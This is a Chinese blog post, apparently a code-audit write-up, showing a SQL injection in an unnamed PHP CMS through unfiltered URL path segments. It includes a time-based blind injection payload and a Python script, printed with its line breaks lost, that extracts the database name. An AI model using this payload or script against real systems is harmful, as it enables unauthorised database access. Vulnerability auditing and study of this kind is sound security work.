搭建源码(3.9​​​​​​​

环境

路径:\Include\web_inc.php

通过$_SERVER["REQUEST_URI"]获取$web_urls

然后用 / 分割

再将第二个和第三个参数传入到web_language_ml函数中

下面我们跟踪一下web_language_ml函数(位置Include\contorl.php)

可以看到红色箭头部分对我们传入的参数和sql语句进行了拼接操作

利用思路

首先我们找到这个cms对于sql注入的过滤函数

位于Include\contorl.php

可以看到函数只对所有通过get方式传入的变量进行过滤,而此时我们可控的参数$web_urls[1],$web_urls[2]是通过$_SERVER["REQUEST_URI"]来传入的,也就是说cms不会对我们传入的可控参数进行过滤

利用payload

http://localhost/index.php/testtesttest'or(sleep(3))or'

其中红色部分会被解析为$web_urls[1],绿色部分会被解析为$web_urls[2]

然后和下面这个语句拼接

select * from sc_language where language_url='$web_urls1' or language_url='$web_urls2' and  language_open=1

拼接后就变成

select * from sc_language where language_url=' index.php ' or language_url=' testtesttest'or(sleep(3))or'' and  language_open=1

发现可以实现基于时间的盲注,编写python脚本

代码

import requestsimport datetimeimport timename=''for i in range(1,15):for z in range(97,123):time1 = datetime.datetime.now()payload ="http://localhost/index.php/testtesttest'or(if(ascii(substr(database(),%d,1))=%d,sleep(3),1))or'"%(i,z)r = requests.get(payload)time2 = datetime.datetime.now()sec = (time2 - time1).secondsif sec >= 1:z=chr(z)name += zprint(name)break

(php)某cms的一次sql注入审计相关推荐

  1. java mybatis狂神说sql_Mybatis框架下SQL注入审计分析

    前言 SQL注入漏洞作为WEB安全的最常见的漏洞之一,在java中随着预编译与各种ORM框架的使用,注入问题也越来越少.新手代码审计者往往对Java Web应用的多个框架组合而心生畏惧,不知如何下手, ...

  2. Mybatis框架下SQL注入审计分析

    前言 SQL注入漏洞作为WEB安全的最常见的漏洞之一,在java中随着预编译与各种ORM框架的使用,注入问题也越来越少.新手代码审计者往往对Java Web应用的多个框架组合而心生畏惧,不知如何下手, ...

  3. [春秋云镜wp]CVE-2022-28060 CVE-2022-26201 Victor CMS v1.0存在sql注入漏洞复现拿flag

    CVE-2022-28060 访问题目提示的login.php,登录框登录抓包,保存为2.txt,sqlmap跑起来 python3 sqlmap.py -r 2.txt --file-read &q ...

  4. php sql注入审计,php审计基础一:sql注入

    [1]普通sql注入: $sql = "INSERT INTO books(bookname, publisher, author, price, ptime,pic,detail) VAL ...

  5. Java代码审计(7)Sql注入审计

    文章目录 1.基础 1.1 常见注入点 1.2 数据库特性 1.2.1 数据库特定表 1.2.2 注释符 1.2.3 数据库报错 1.2.4 MySQL 5.0 中information_schema ...

  6. SQL 注入真是防不胜防!

    以下文章来源方志朋的博客,回复"666"获面试宝典 来源:https://www.freebuf.com/vuls/240578.html 前言 SQL注入漏洞作为WEB安全的最常 ...

  7. MyBatis 框架下 SQL 注入攻击的 3 种方式,真是防不胜防!

    点击上方"方志朋",选择"设为星标" 回复"666"获取新整理的面试文章 本文授权转载请注明来自FreeBuf.COM 链接:https:/ ...

  8. java mybatis狂神说sql_Mybatis 框架下 SQL 注入攻击的 3 种方式,真是防不胜防!

    前言 SQL注入漏洞作为WEB安全的最常见的漏洞之一,在java中随着预编译与各种ORM框架的使用,注入问题也越来越少. 新手代码审计者往往对Java Web应用的多个框架组合而心生畏惧,不知如何下手 ...

  9. Mybatis中SQL注入攻击的3种方式,真是防不胜防!

    作者 | sunnyf 来源 | https://www.freebuf.com/vuls/240578.html 前言 SQL注入漏洞作为WEB安全的最常见的漏洞之一,在java中随着预编译与各种O ...

最新文章

  1. 虚拟纹理与几何图像技术
  2. php鼠标经过显示文本,jQuery实现鼠标单击网页文字后在文本框显示的方法
  3. 以脚本方式直接执行修改密码的passwd命令
  4. 2020-11-22(操作系统——页面置换算法)
  5. php获取压缩文件列表,php获取所有文件并压缩
  6. boost::type_erasure模块实现类型安全的 printf的测试程序
  7. OC系列foundation Kit基础-NSString
  8. 期货与期权(part10)--远期与期货合约的比较
  9. Scapy之ARP询问
  10. F - Sugoroku2(期望dp)
  11. enc易能变频_ENC易能变频器故障灯亮快修收费合理
  12. VMWare笔记-解决虚拟机能ping通主机能上网,但主机ping不通虚拟机(含思路)
  13. linux发挥不出显卡性能,Ubuntu 9.04 显卡性能不佳问题的解决
  14. 遥感技术在水利行业中的应用
  15. visio反向工程 mysql_Visio 2010对MySQL数据库反向工程生成ER数据库模型图
  16. Java后台推送离线通知
  17. c语言变量格式化,C语言新手入门之格式化输出和变量类型
  18. C(每日一题)——数据结构——创建一个线性链表(详细过程)
  19. html中的特殊符号表示法
  20. 给IT新人的15点建议

热门文章

  1. HTML5 Audio(音频)简介
  2. 性能测试并发数的选取
  3. android 人物走动_Android游戏开发学习(2)--SurfaceView实例控制角色移动
  4. [RPM打包学习-SPEC文件]——%patch相关问题
  5. appearance: none;的使用
  6. “梭哈之王”深圳传奇大空翼
  7. 惠普服务器开机显示器没反应 主机一直跟响,惠普电脑开不了机,一直发出‘滴 滴 滴 滴’的响声是怎么回事...
  8. excel数据复制粘贴入PL/SQL Developer的方法
  9. xgboost 正则项_XGBoost
  10. [INS-13001] Environment Does not Meet Minimum Req